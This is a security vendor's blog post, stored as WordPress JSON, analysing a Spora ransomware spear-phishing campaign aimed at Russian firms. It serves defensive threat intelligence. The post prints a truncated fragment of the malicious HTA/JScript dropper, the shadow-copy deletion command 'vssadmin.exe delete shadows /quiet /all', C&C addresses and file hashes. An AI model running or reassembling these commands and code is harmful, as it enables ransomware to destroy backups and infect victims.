{"id":2373,"date":"2024-09-25T17:44:53","date_gmt":"2024-09-25T17:44:53","guid":{"rendered":"https:\/\/xdr-mdr.lmntrix.com\/main_web\/?p=2373"},"modified":"2025-07-29T03:37:39","modified_gmt":"2025-07-29T03:37:39","slug":"spora-ransomware-returns-with-russia-in-its-sights","status":"publish","type":"post","link":"https:\/\/lmntrix.com\/blog\/spora-ransomware-returns-with-russia-in-its-sights\/","title":{"rendered":"Spora ransomware returns with Russia in its sights"},"content":{"rendered":"<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img fetchpriority=\"high\" decoding=\"async\" width=\"422\" height=\"318\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/russian-dolls-912310_1280.webp\" alt=\"\" class=\"wp-image-2375\" style=\"width:560px;height:auto\"\/><\/figure>\n<\/div>\n\n\n<p>LMNTRIX researchers are currently tracking a ransomware campaign slinging Spora \u2013 an incredibly sophisticated ransomware strain. The campaign is highly targeted against organisations operating in Russia. Those behind the campaign are using a Malaysian web hosting platform as their malware repository, whether it is a compromised account or the attackers have paid for the privilege is unclear.\u00a0<br><br>For background, \u00a0Spora ransomware was most active in the first quarter of 2017 and was able to fool static Antivirus signatures by using HTA (HTML application) embedded into a PDF (<a href=\"https:\/\/nakedsecurity.sophos.com\/2017\/06\/26\/how-spora-ransomware-tries-to-fool-antivirus\/\" target=\"_blank\" rel=\"noopener\">as reported by Sophos<\/a>). TTPs remain the same (although some earlier campaigns also had an English language variant which so far this campaign lacks) .\u00a0<br><br>Complete TTPs can be found further below:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"756\" height=\"459\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Spora1.webp\" alt=\"\" class=\"wp-image-2376\"\/><\/figure>\n\n\n\n<p> \u00a0 \u00a0 \u00a0 \u00a0\u00a0<br><strong>DELIVERY<\/strong><br><br>The sample we analysed was received as part of a spear phishing campaign targeting the Russian employees of an automotive firm. The email was sent from a free Russian mail address \u201c<strong>tatjana.schwenk@mail.ru<\/strong> &#8220;. <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"622\" height=\"209\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Spora21.webp\" alt=\"\" class=\"wp-image-2377\"\/><\/figure>\n\n\n\n<p><br><br>The email is sent with a call to action IP address in the body of the email:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1016\" height=\"391\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Spora3.webp\" alt=\"\" class=\"wp-image-2378\"\/><\/figure>\n\n\n\n<p>The sender wants the victim to download a file hosted on the secure server. The text of the email is in Russian Cyrillic. On further investigation, we found that the IP address (111[.]90[.]149[.]37) is registered with the Malaysian web hosting company, Shinjiru. The LMNTRIX team has contacted the hosting provider to take down the malware repository.\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"799\" height=\"332\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Spora4.webp\" alt=\"\" class=\"wp-image-2380\"\/><\/figure>\n\n\n\n<p><br>When the file is downloaded from the repository, it looks like this: \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"698\" height=\"497\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Spora5.webp\" alt=\"\" class=\"wp-image-2381\"\/><\/figure>\n\n\n\n<p><br><br>The downloaded ZIP archive file is named:<br><br>\u00a0 <strong>\u041f\u0435\u0440\u0435\u0447\u0435\u043d\u044c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 18 \u0410\u0412\u0413 _ \u0421\u0420\u041e\u0427\u041d\u041e &#8211; \u041f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043e \u0433\u043b\u0430\u0432.\u0431\u0443\u0445\u043e\u043c.zip<br><br>\u00a0 \u00a0 SHA256: fae787a4a97bac95d49a00196fecaf2026f396b5fc83b7faef629b39e18b97fc<br><br>\u00a0 \u00a0 Threat Name: <em>Trojan-Ransom.Win32.Spora.emy<\/em><\/strong><br><\/p>\n\n\n\n<p><strong>INFECTION<\/strong><br><br>The ZIP archive file contains a JavaScript file, embedded with malicious code, which acts as a dropper agent.<br><br>Filename: <strong>\u041f\u0435\u0440\u0435\u0447\u0435\u043d\u044c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 18 \u0410\u0412\u0413 _ \u0421\u0420\u041e\u0427\u041d\u041e &#8211; \u041f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043e \u0433\u043b\u0430\u0432.\u0431\u0443\u0445\u043e\u043c.js&nbsp;<\/strong><br><br>SHA256:c78612d1d50b3cbe9709f173c42808858eeec2cf4e15cc8b0b7a4b6b373c9b77<br><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&lt;hta:application showInTaskbar=&#8221;no&#8221; innerBorder=&#8221;no&#8221; navigable=&#8221;no&#8221; scroll=&#8221;no&#8221; border=&#8221;none&#8221; caption=&#8221;none&#8221;&gt;&lt;html&gt;&lt;body&gt;&lt;script language=&#8217;JScript&#8217;&gt;t = new ActiveXObject(&#8216;WScript.Shell&#8217;).ExpandEnvironmentStrings(&#8216;%temp%&#8217;);f = new ActiveXObject(&#8216;Scripting.FileSystemObject&#8217;);c = new ActiveXObject(&#8216;ADODB.Stream&#8217;);if(!f.FileExists(t+&#8217;\\\\icon_2.png&#8217;)){b = new ActiveXObject(&#8216;MSXML2.DOMDocument&#8217;).createElement(&#8216;r&#8217;);b.text=&#8217;i<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>The HTML application code makes the script file invoke the shell code for communication with the C&amp;C, which then drops the payload path file.\u00a0<br><br>The spawned process <strong>msHta.exe<\/strong> uses file path: <strong>&#8220;%APPDATA%\\Microsoft\\Windows\\StartMenu\\Programs\\Startup\\README_sTlLoTpq.hta\u201d<\/strong> \u00a0<br><br>Communication to the C&amp;C domain is established by the HTA process:<br><br>5pr6hirtlfan3j76.onion\u00a0\u00a0 \u00a031.192.105.180\u00a0\u00a0 \u00a0&#8211;\u00a0\u00a0 \u00a0Russian Federation<br><br>31.192.105.180 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 OSINT\u00a0\u00a0 \u00a08123 \u00a0 \u00a0 \u00a0TCP\u00a0\u00a0 \u00a0mshta.exe (PID: 468)<br><br>The spawned process runs further shell commands to delete the shadow file of the infected system:<br><br><strong>\u201c\/c vssadmin.exe delete shadows \/quiet \/all&#8221;<\/strong><br><br>Along with access to <strong>\u201cMountPointManager\u201d <\/strong>to look for more infection locations, the following files are accessed on the infected machine:<br><br><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"269\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Spora6-1024x269.webp\" alt=\"\" class=\"wp-image-2382\"\/><\/figure>\n\n\n\n<p><br><br><strong>ENCRYPTION<\/strong><br><br>One unique feature of Spora is that it doesn\u2019t add any file extensions or rename\u00a0<br><br>the encrypted file.\u00a0<br><br>Upon execution on the victim\u2019s machine, a script error pops up and forces the\u00a0<br><br>user to accept the script execution option, as seen below:<br><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"392\" height=\"253\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Spora7.webp\" alt=\"\" class=\"wp-image-2383\" srcset=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Spora7.webp 392w, https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Spora7-280x180.webp 280w\" sizes=\"(max-width: 392px) 100vw, 392px\" \/><\/figure>\n\n\n\n<p><br><br>The associated process can be seen executing the error here:<br><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"777\" height=\"223\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Spora8.webp\" alt=\"\" class=\"wp-image-2384\"\/><\/figure>\n\n\n\n<p>The following ransom message is then displayed on the machine:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"872\" height=\"481\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Spora9.webp\" alt=\"\" class=\"wp-image-2385\"\/><\/figure>\n\n\n\n<p><br><br><strong>COMMAND &amp; CONTROL<\/strong><br><br>From the domain (<strong>http:\/\/5pr6hirtlfan3j76.onion\/<\/strong>), the below strings could be extracted with TCP communications established for IP and port 31.192.105.180:8123<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"282\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Spora10-1024x282.webp\" alt=\"\" class=\"wp-image-2386\"\/><\/figure>\n\n\n\n<p><br><strong>INDICATORS OF COMPROMISE (IOC)<\/strong><br><br>31.192.105.180<br><br>111.90.149.37<br><br>http:\/\/5pr6hirtlfan3j76.onion<br><br>%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\README_sTlLoTpq.hta<br><br>%TEMP%\\rad937F7.exe<br><br><strong>Associated SHA256<\/strong><br><br>c78612d1d50b3cbe9709f173c42808858eeec2cf4e15cc8b0b7a4b6b373c9b77\u00a0<br><br>fae787a4a97bac95d49a00196fecaf2026f396b5fc83b7faef629b39e18b97fc<br><br><strong>CONCLUSION<\/strong><br><br>This campaign is currently active and \u2013 for now at least \u2013 is targeting only Russian organisations. The first infection we witnessed was on August 18, with some threat intelligence feeds suggesting the campaign began a few days earlier on August 15.<br><br>\u00a0<\/p>\n","protected":false},"excerpt":{"rendered":"<p>LMNTRIX researchers are currently tracking a ransomware campaign slinging Spora &ndash; an incredibly sophisticated ransomware strain. The campaign is highly targeted against organisations operating in Russia. Those behind the campaign are using a Malaysian web hosting platform as their malware repository, whether it is a compromised account or the attackers have paid for the privilege [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2375,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-2373","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2373","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/comments?post=2373"}],"version-history":[{"count":3,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2373\/revisions"}],"predecessor-version":[{"id":3469,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2373\/revisions\/3469"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media\/2375"}],"wp:attachment":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media?parent=2373"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/categories?post=2373"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/tags?post=2373"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}